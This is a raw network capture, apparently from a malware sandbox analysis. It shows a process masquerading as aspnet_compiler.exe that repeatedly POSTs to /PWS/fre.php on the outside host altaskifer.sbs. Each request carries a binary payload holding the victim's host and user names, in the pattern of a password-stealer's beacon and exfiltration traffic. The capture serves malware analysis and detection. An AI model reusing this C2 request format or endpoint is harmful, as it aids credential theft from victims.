                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQlf5%2FacuzMTkhNJgzGLZhnCDuGZmEryVICVmz8xDF2ym%2BMi4i7DOkuSoaCgT74FoHB6xKgbwl8rtWhhz7ialFEoMikReHzqGOJ9%2BC8VZ5c0je%2Fuz1iaXknZeIzeSMrHEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700111bf94031de-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649721172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:27.109786987 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:27.234020948 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:27.639862061 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:27 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONA6rX4dIjq0FRHXmN2kZ2ccbZE0DrIAdlgCB4hb9%2BhB5awqiHVQdw0zJ9gYMvjjpyVI6dId2b2qCQUbpsYS0%2F%2FYCIGRzKVvpGciEWNfUjS76H1RteYAGfMg13Fg4FEjNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001120dc640a3a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649722172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:27.906070948 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:28.029813051 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:28.413724899 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:28 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9i5I%2BracQCcxDtbpzUbdOiX6%2FwkWRPKLgdxykSAcPP5CjaxHsaHVZa1YDUJdptqhRfzPfxD%2FaFi0C%2BHMPSfZZ9JzwAhWYF5c8%2BpL4YG4aOVdNDz7lHnufK8iWqkzyj16%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001125c8cb9acc-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649723172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:28.699734926 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:28.823987007 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:29.197910070 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUmyiwEd2zpFZsUAyI2ESZOLJ3RoFI7xRP1ztasVJ5FQvs81KArTtNXS6KS2kmknhMM%2B%2FV8n0kB5ECzTTsMO%2B52kW2Eg2Bts85aNV8XIq2p8Hvwfs1kLIeu%2BCoD1wV4lyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700112acc7d746d-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.649724172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:29.470676899 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:29.594660997 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:29.977092981 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfO5XLLVxWaNiZKsnR3N%2Bzt1JjZxCOKWjjtU00rPBkBavNUBwoMEFYq5md3Y%2FvsYKJgxzqV6u41vqHNPK1NmzL5KJoI9FP%2FlMNbgYk7sZz9olEJB0kpeRdnKBLJDJEQreg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700112f9d543716-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.649725172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:30.251229048 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:30.375672102 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:30.771745920 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMZnBkdceyFE2b24b%2BfYVFN6ykyVZABVUSCTOE5OIzeiw%2FNdCqW63u01LzCdepKlTKvXU9cfx%2B5f8ttgfMJfgJQz30osK1oYB8ONphvfv%2F4kakHTSmGASlFA2%2BkOldEypg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011347f8e336a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.649727172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:31.298966885 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:31.430867910 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:31.809593916 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Ao6YPXXkWHvRESy3tdUirn6gNtrA5tNz359v%2FbNuuJIqYSZNZBCRfEqElWXbxfy5EIdXxKd9qdvm2pyJM3OWFQ%2BE%2BcBB66MOQI3zQFRJQCy5v3iYgmyilEc5%2B5b6bMWqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700113b0e78a560-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.649728172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:33.293190956 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:33.417077065 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:33.795572042 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:33 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vj57YDwUvjiFWtx7WNXCXL6I2aHdsAEO%2FUtJ0efrycQINbWbAOAVxIbRPWjkUiBFM4kHzP0J%2FRxvu4zA8I%2B49Hi5O6aDGx3JQ9WWvlg8OGsPDx%2BKjXGIizHKzvQLx1%2BIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011477836dad5-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.649729172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:34.079276085 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:34.203481913 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:34.587708950 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:34 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpcO4e2MmBG8j6ozX8bgTowbyzV5rECbGdYseCZ6Zkq%2BF77mx9p%2B1VWaSNglSIxEe7ThtaBYDTnYt%2BDZoUbO0Hd1GnVJl9EjR4S6%2B00CE9pb1DTZyeD00OUfac5tYzVmpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700114c686b9acb-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.649731172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:34.860100031 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:34.984730005 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:35.355005980 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:35 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZAAR69kvm8pG%2BzEIMCKOWZWQtij1b1yDdUxNreY8JpoB5zd0hv08VnYUMWkxYGqGYvhOjN6GdyQcicEN2o5S3Rf6%2FVERPIR0iiGXUpYMWNA%2BXTiwvx4f%2FVUT8mjC%2Fh4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011514e04a4f4-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.649734172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:35.705322027 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:35.829746962 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:36.210764885 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx6YIKEpJ2IyF45rEKr%2BVGrtTVGOXmSpMrhrPhzQKwOUkQfIoTREnWAvJssubCQw9AwhJtlt2xNO6mTQRn%2Fl%2BV1J94m0ZZhWX0cgML1ZS1SBKRnWtxMAWcSTBEuI2xCBgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870011568bc831e6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.649737172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:36.488684893 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:36.614898920 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:36.985990047 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCAAOS1pSnGhzyPQRn5rHK9nAzs9RSoknv67Z4pmfqeXP11pEi31W0UsP%2BtA6QOIffEWbhNl3HgXQmdeSnvzTeN%2F5ln%2BWkCrnQDzXghK%2FW3FjZqruM2rnsHpMe1OSJkivg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700115b7d46a569-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.649739172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:37.260471106 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:37.384936094 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:37.756086111 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:37 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXhtAyGeRIx8GsNU2BQ6IwXoQi7BerEUnab%2BGEd6cNL4sDv%2B02StVEc12eA2Prp%2BEUb7P6aIgUMxZUKRUJTQceN0JC0Yy%2FKuItRKaH6YGfXtMFTufL9eac5VXAoEHoVEJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700116048bb31fb-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.649740172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:38.036926985 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:38.161511898 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:38.531016111 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEV7kfho2DE7dnxvYx8F6ESdhQ4g3ROHp6CzmI0n%2FIRBx%2FW7NZW76sFvw3AIodXS3zdzWEYNt7XIxZ4QBJFvIbwRNTOVO%2FCMJw2GypTFLRf3va2%2Fo%2FTq05Ib5VU8s7Oew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700116528058dfd-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.649741172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:29:38.799314976 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:29:38.924406052 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:29:39.313935995 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:29:39 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
